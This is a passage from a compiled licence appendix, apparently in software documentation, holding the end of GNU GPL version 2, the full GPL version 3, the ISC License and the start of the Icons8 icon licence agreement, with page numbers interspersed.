the\nprogram under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is\ninteractive but does not normally print such an announcement, your work based on the Program is not required to print an\nannouncement.)\nThese requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the\nProgram, and can be reasonably considered independent and separate works in themselves, then this License, and its\nterms, do not apply to those sections when you distribute them as separate works. But when you distribute the same\nsections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this\nLicense, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of\nwho wrote it.\nThus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is\nto exercise the right to control the distribution of derivative or collective works based on the Program.\nIn addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the\nProgram) on a volume of a storage or distribution medium does not bring the other work under the scope of this License.\n3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under\nthe terms of Sections 1 and 2 above provided that you also do one of the following:\na) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms\nof Sections 1 and 2 above on a medium customarily used for software interchange; or,\nb) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost\nof physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be\ndistributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or,\nc) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is\nallowed only for noncommercial distribution and only if you received the program in object code or executable form with such\nan offer, in accord with Subsection b above.)\nThe source code for a work means the preferred form of the work for making modifications to it. For an executable work,\ncomplete source code means all the source code for all modules it contains, plus any associated interface definition files,\nplus the scripts used to control compilation and installation of the executable. However, as a special exception, the source\n32\ncode distributed need not include anything that is normally distributed (in either source or binary form) with the major\ncomponents (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component\nitself accompanies the executable.\nIf distribution of executable or object code is made by offering access to copy from a designated place, then offering\nequivalent access to copy the source code from the same place counts as distribution of the source code, even though third\nparties are not compelled to copy the source along with the object code.\n4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any\nattempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights\nunder this License. However, parties who have received copies, or rights, from you under this License will not have their\nlicenses terminated so long as such parties remain in full compliance.\n5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to\nmodify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License.\nTherefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of\nthis License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it.\n6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license\nfrom the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not\nimpose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing\ncompliance by third parties to this License.\n7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent\nissues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of\nthis License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy\nsimultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not\ndistribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all\nthose who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would\nbe to refrain entirely from distribution of the Program.\nIf any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is\nintended to apply and the section as a whole is intended to apply in other circumstances.\nIt is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of\nany such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is\nimplemented by public license practices. Many people have made generous contributions to the wide range of software\ndistributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he\nor she is willing to distribute software through any other system and a licensee cannot impose that choice.\nThis section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License.\n8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces,\nthe original copyright holder who places the Program under this License may add an explicit geographical distribution\nlimitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such\ncase, this License incorporates the limitation as if written in the body of this License.\n9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time.\nSuch new versions will be similar in spirit to the present version, but may differ in detail to address new problems or\nconcerns.\nEach version is given a distinguishing version number. If the Program specifies a version number of this License which\napplies to it and \"any later version\", you have the option of following the terms and conditions either of that version or of any\nlater version published by the Free Software Foundation. If the Program does not specify a version number of this License,\nyou may choose any version ever published by the Free Software Foundation.\n10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write\n33\nto the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free\nSoftware Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the\nfree status of all derivatives of our free software and of promoting the sharing and reuse of software generally.\nNO WARRANTY\n11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO\nTHE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE\nCOPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY\nKIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND\nPERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT\nHOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED\nABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR\nCONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT\nNOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR\nTHIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n34\nGNU General Public License Version 3\n29 June 2007\nCopyright (C) 2007 Free Software Foundation, Inc.\nEveryone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.\nPreamble\nThe GNU General Public License is a free, copyleft license for software and other kinds of works.\nThe licenses for most software and other practical works are designed to take away your freedom to share and change the\nworks. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions\nof a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU\nGeneral Public License for most of our software; it applies also to any other work released this way by its authors. You can\napply it to your programs, too.\nWhen we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make\nsure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive\nsource code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that\nyou know you can do these things.\nTo protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights.\nTherefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to\nrespect the freedom of others.\nFor example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the\nsame freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must\nshow them these terms so they know their rights.\nDevelopers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you\nthis License giving you legal permission to copy, distribute and/or modify it.\nFor the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both\nusers' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be\nattributed erroneously to authors of previous versions.\nSome devices are designed to deny users access to install or run modified versions of the software inside them, although\nthe manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the\nsoftware. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where\nit is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If\nsuch problems arise substantially in other domains, we stand ready to extend this provision to those domains in future\nversions of the GPL, as needed to protect the freedom of users.\nFinally, every program is threatened constantly by software patents. States should not allow patents to restrict development\nand use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents\napplied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used\nto render the program non-free.\nThe precise terms and conditions for copying, distribution and modification follow.\nTERMS AND CONDITIONS\n0. Definitions.\n35\n“This License” refers to version 3 of the GNU General Public License.\n“Copyright” also means copyright-like laws that apply to other kinds of works, such as semiconductor masks.\n“The Program” refers to any copyrightable work licensed under this License. Each licensee is addressed as “you”.\n“Licensees” and “recipients” may be individuals or organizations.\nTo “modify” a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than\nthe making of an exact copy. The resulting work is called a “modified version” of the earlier work or a work “based on” the\nearlier work.\nA “covered work” means either the unmodified Program or a work based on the Program.\nTo “propagate” a work means to do anything with it that, without permission, would make you directly or secondarily liable for\ninfringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation\nincludes copying, distribution (with or without modification), making available to the public, and in some countries other\nactivities as well.\nTo “convey” a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction\nwith a user through a computer network, with no transfer of a copy, is not conveying.\nAn interactive user interface displays “Appropriate Legal Notices” to the extent that it includes a convenient and prominently\nvisible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work\n(except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view\na copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the\nlist meets this criterion.\n1. Source Code.\nThe “source code” for a work means the preferred form of the work for making modifications to it. “Object code” means any\nnon-source form of a work.\nA “Standard Interface” means an interface that either is an official standard defined by a recognized standards body, or, in\nthe case of interfaces specified for a particular programming language, one that is widely used among developers working in\nthat language.\nThe “System Libraries” of an executable work include anything, other than the work as a whole, that (a) is included in the\nnormal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable\nuse of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to\nthe public in source code form. A “Major Component”, in this context, means a major essential component (kernel, window\nsystem, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to\nproduce the work, or an object code interpreter used to run it.\nThe “Corresponding Source” for a work in object code form means all the source code needed to generate, install, and (for\nan executable work) run the object code and to modify the work, including scripts to control those activities. However, it does\nnot include the work's System Libraries, or general-purpose tools or generally available free programs which are used\nunmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes\ninterface definition files associated with source files for the work, and the source code for shared libraries and dynamically\nlinked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow\nbetween those subprograms and other parts of the work.\nThe Corresponding Source need not include anything that users can regenerate automatically from other parts of the\nCorresponding Source.\nThe Corresponding Source for a work in source code form is that same work.\n36\n2. Basic Permissions.\nAll rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the\nstated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The\noutput from running a covered work is covered by this License only if the output, given its content, constitutes a covered\nwork. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law.\nYou may make, run and propagate covered works that you do not convey, without conditions so long as your license\notherwise remains in force. You may convey covered works to others for the sole purpose of having them make\nmodifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the\nterms of this License in conveying all material for which you do not control copyright. Those thus making or running the\ncovered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them\nfrom making any copies of your copyrighted material outside their relationship with you.\nConveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed;\nsection 10 makes it unnecessary.\n3. Protecting Users' Legal Rights From Anti-Circumvention Law.\nNo covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations\nunder article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting\ncircumvention of such measures.\nWhen you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the\nextent such circumvention is effected by exercising rights under this License with respect to the covered work, and you\ndisclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or\nthird parties' legal rights to forbid circumvention of technological measures.\n4. Conveying Verbatim Copies.\nYou may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you\nconspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this\nLicense and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the\nabsence of any warranty; and give all recipients a copy of this License along with the Program.\nYou may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a\nfee.\n5. Conveying Modified Source Versions.\nYou may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source\ncode under the terms of section 4, provided that you also meet all of these conditions:\na) The work must carry prominent notices stating that you modified it, and giving a relevant date.\nb) The work must carry prominent notices stating that it is released under this License and any conditions added under\nsection 7. This requirement modifies the requirement in section 4 to “keep intact all notices”.\nc) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This\nLicense will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts,\nregardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not\ninvalidate such permission if you have separately received it.\nd) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has\ninteractive interfaces that do not display Appropriate Legal Notices, your work need not make them do so.\nA compilation of a covered work with other separate and independent works, which are not by their nature extensions of the\ncovered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or\ndistribution medium, is called an “aggregate” if the compilation and its resulting copyright are not used to limit the access or\n37\nlegal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate\ndoes not cause this License to apply to the other parts of the aggregate.\n6. Conveying Non-Source Forms.\nYou may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the\nmachine-readable Corresponding Source under the terms of this License, in one of these ways:\na) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by\nthe Corresponding Source fixed on a durable physical medium customarily used for software interchange.\nb) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by\na written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product\nmodel, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in\nthe product that is covered by this License, on a durable physical medium customarily used for software interchange, for a\nprice no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the\nCorresponding Source from a network server at no charge.\nc) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This\nalternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in\naccord with subsection 6b.\nd) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to\nthe Corresponding Source in the same way through the same place at no further charge. You need not require recipients to\ncopy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the\nCorresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying\nfacilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source.\nRegardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as\nneeded to satisfy these requirements.\ne) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and\nCorresponding Source of the work are being offered to the general public at no charge under subsection 6d.\nA separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library,\nneed not be included in conveying the object code work.\nA “User Product” is either (1) a “consumer product”, which means any tangible personal property which is normally used for\npersonal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining\nwhether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product\nreceived by a particular user, “normally used” refers to a typical or common use of that class of product, regardless of the\nstatus of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the\nproduct. A product is a consumer product regardless of whether the product has substantial commercial, industrial or\nnon-consumer uses, unless such uses represent the only significant mode of use of the product.\n“Installation Information” for a User Product means any methods, procedures, authorization keys, or other information\nrequired to install and execute modified versions of a covered work in that User Product from a modified version of its\nCorresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is\nin no case prevented or interfered with solely because modification has been made.\nIf you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying\noccurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in\nperpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under\nthis section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any\nthird party retains the ability to install modified object code on the User Product (for example, the work has been installed in\nROM).\nThe requirement to provide Installation Information does not include a requirement to continue to provide support service,\nwarranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has\nbeen modified or installed. Access to a network may be denied when the modification itself materially and adversely affects\nthe operation of the network or violates the rules and protocols for communication across the network.\n38\nCorresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is\npublicly documented (and with an implementation available to the public in source code form), and must require no special\npassword or key for unpacking, reading or copying.\n7. Additional Terms.\n“Additional permissions” are terms that supplement the terms of this License by making exceptions from one or more of its\nconditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in\nthis License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the\nProgram, that part may be used separately under those permissions, but the entire Program remains governed by this\nLicense without regard to the additional permissions.\nWhen you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or\nfrom any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the\nwork.) You may place additional permissions on material, added by you to a covered work, for which you have or can give\nappropriate copyright permission.\nNotwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the\ncopyright holders of that material) supplement the terms of this License with terms:\na) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or\nb) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate\nLegal Notices displayed by works containing it; or\nc) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked\nin reasonable ways as different from the original version; or\nd) Limiting the use for publicity purposes of names of licensors or authors of the material; or\ne) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or\nf) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified\nversions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions\ndirectly impose on those licensors and authors.\nAll other non-permissive additional terms are considered “further restrictions” within the meaning of section 10. If the\nProgram as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term\nthat is a further restriction, you may remove that term. If a license document contains a further restriction but permits\nrelicensing or conveying under this License, you may add to a covered work material governed by the terms of that license\ndocument, provided that the further restriction does not survive such relicensing or conveying.\nIf you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the\nadditional terms that apply to those files, or a notice indicating where to find the applicable terms.\nAdditional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as\nexceptions; the above requirements apply either way.\n8. Termination.\nYou may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to\npropagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses\ngranted under the third paragraph of section 11).\nHowever, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a)\nprovisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the\ncopyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation.\nMoreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the\nviolation by some reasonable means, this is the first time you have received notice of violation of this License (for any work)\nfrom that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice.\n39\nTermination of your rights under this section does not terminate the licenses of parties who have received copies or rights\nfrom you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to\nreceive new licenses for the same material under section 10.\n9. Acceptance Not Required for Having Copies.\nYou are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a\ncovered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not\nrequire acceptance. However, nothing other than this License grants you permission to propagate or modify any covered\nwork. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered\nwork, you indicate your acceptance of this License to do so.\n10. Automatic Licensing of Downstream Recipients.\nEach time you convey a covered work, the recipient automatically receives a license from the original licensors, to run,\nmodify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties\nwith this License.\nAn “entity transaction” is a transaction transferring control of an organization, or substantially all assets of one, or subdividing\nan organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to\nthat transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in\ninterest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work\nfrom the predecessor in interest, if the predecessor has it or can get it with reasonable efforts.\nYou may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For\nexample, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and\nyou may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed\nby making, using, selling, offering for sale, or importing the Program or any portion of it.\n11. Patents.\nA “contributor” is a copyright holder who authorizes use under this License of the Program or a work on which the Program is\nbased. The work thus licensed is called the contributor's “contributor version”.\nA contributor's “essential patent claims” are all patent claims owned or controlled by the contributor, whether already\nacquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or\nselling its contributor version, but do not include claims that would be infringed only as a consequence of further modification\nof the contributor version. For purposes of this definition, “control” includes the right to grant patent sublicenses in a manner\nconsistent with the requirements of this License.\nEach contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent\nclaims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor\nversion.\nIn the following three paragraphs, a “patent license” is any express agreement or commitment, however denominated, not to\nenforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To\n“grant” such a patent license to a party means to make such an agreement or commitment not to enforce a patent against\nthe party.\nIf you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not\navailable for anyone to copy, free of charge and under the terms of this License, through a publicly available network server\nor other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2)\narrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent\nwith the requirements of this License, to extend the patent license to downstream recipients. “Knowingly relying” means you\nhave actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use\n40\nof the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to\nbelieve are valid.\nIf, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance\nof, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use,\npropagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended\nto all recipients of the covered work and works based on it.\nA patent license is “discriminatory” if it does not include within the scope of its coverage, prohibits the exercise of, or is\nconditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not\nconvey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software,\nunder which you make payment to the third party based on the extent of your activity of conveying the work, and under which\nthe third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a)\nin connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and\nin connection with specific products or compilations that contain the covered work, unless you entered into that arrangement,\nor that patent license was granted, prior to 28 March 2007.\nNothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that\nmay otherwise be available to you under applicable patent law.\n12. No Surrender of Others' Freedom.\nIf conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this\nLicense, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy\nsimultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not\nconvey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to\nwhom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely\nfrom conveying the Program.\n13. Use with the GNU Affero General Public License.\nNotwithstanding any other provision of this License, you have permission to link or combine any covered work with a work\nlicensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting\nwork. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of\nthe GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination\nas such.\n14. Revised Versions of this License.\nThe Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to\ntime. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or\nconcerns.\nEach version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU\nGeneral Public License “or any later version” applies to it, you have the option of following the terms and conditions either of\nthat numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a\nversion number of the GNU General Public License, you may choose any version ever published by the Free Software\nFoundation.\nIf the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that\nproxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program.\nLater license versions may give you additional or different permissions. However, no additional obligations are imposed on\nany author or copyright holder as a result of your choosing to follow a later version.\n15. Disclaimer of Warranty.\n41\nTHERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT\nWHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE\nPROGRAM “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.\nTHE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE\nPROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR\nCORRECTION.\n16. Limitation of Liability.\nIN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT\nHOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE\nLIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL\nDAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO\nLOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES\nOR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR\nOTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n17. Interpretation of Sections 15 and 16.\nIf the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their\nterms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in\nconnection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a\nfee.\nEND OF TERMS AND CONDITIONS\n42\nISC License\nCopyright\nPermission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted,\nprovided that the above copyright notice and this permission notice appear in all copies.\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS\nSOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL\nTHE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY\nDAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF\nCONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE\nOR PERFORMANCE OF THIS SOFTWARE.\n43\nStandard License Agreement for Icons8\nVersion 1.3.1\nIntroductory\nDear Customer, This is a legal agreement between Icons8 and purchasers/users of our services, including but not limited to\nicons and illustrations. Your use, download, or copying of an icon, symbol, or any part thereof from our website, constitutes\nyour acceptance of the terms of this Agreement.\nDefinitions\nFor purposes of this License Agreement (i.e. “agreement”), “company”, “designer”, “licensor”, “we, us, or our” shall be\nsynonymous with Icons8; and “You, your” or “licensee” shall be synonymous with the customer or users of our services.\n“Icons”, “illustrations”, or “graphics” to which this agreement pertains in relation to services provided by Icons8 shall be\nsynonymous with “licensed materials”, or “licensed content”.\nLicense\nFor valuable consideration, licensor grants to the licensee, a non-transferable, non-sublicenseable, and non-exclusive,\nworldwide license to use the licensed materials for Permitted Uses, as provided herein. All other rights in and to the licensed\nmaterials, including without restriction, copyright and other intellectual property rights relating to the Icons, are retained by\nthe licensor, as the case may be.\nPermitted Uses\nLicensee may, subject to the Restrictions on Use stated herein, use, alter, crop, modify, or adapt the Licensed Materials in\nconnection with the following permitted uses:\nInternet and intranet\nDesktop and mobile applications\nWeb templates for sale\nPrint media (provided that the licensee is not sublicensing, or allowing redistribution or re-use of the Icons), including but not\nlimited to: advertising and promotional materials, editorial publications, and consumer merchandise\nBroadcasts and theatrical exhibitions\nArtworks intended for resale, provided these products are not intended to allow the re-distribution or re-use of the Licensed\nMaterials\nProhibited Uses\nExcept as provided herein, Licensee may not:\nSublicense, sell, distribute, assign, convey, or otherwise transfer this license, nor any of licensee’s rights, duties, or\nobligations under this Agreement;\nModify, alter, or change any of the terms of this Agreement without our Company’s prior written consent;\nSell, license, or distribute its final product in such a manner that allows others to extract or access the Licensed Content as\nstand-alone files;\nDistribute, post, or upload the Icons online in a downloadable format or enablethe Licensed Material to be accessed,\ndownloaded, or distributed in any manner whatsoever;\nUse of the Licensed Material in any way that infringes upon any copyright, trade name, trademark, or service mark;\nUse of the Licensed Material within a work product for the purpose of creating a final product in which the Licensed\nMaterials are going to be used (such as graphic editors, rapid prototyping tools and programming IDEs).\nShip, transport or export the Licensed Material into any country, or use the Material in any manner prohibited by export\nadministration legislation or any other export laws, restrictions or regulations.\nLicense Usage\nA license is issued based upon the number of individual users who will have access to the Licensed Materials. For purposes\nof this agreement, Licensed Materials may be downloaded unlimited times by the Licensee, on up to three electronic\ndevices, and Licensee may save only one backup copy of each Icon.\nThe Licensee is required under the terms of this 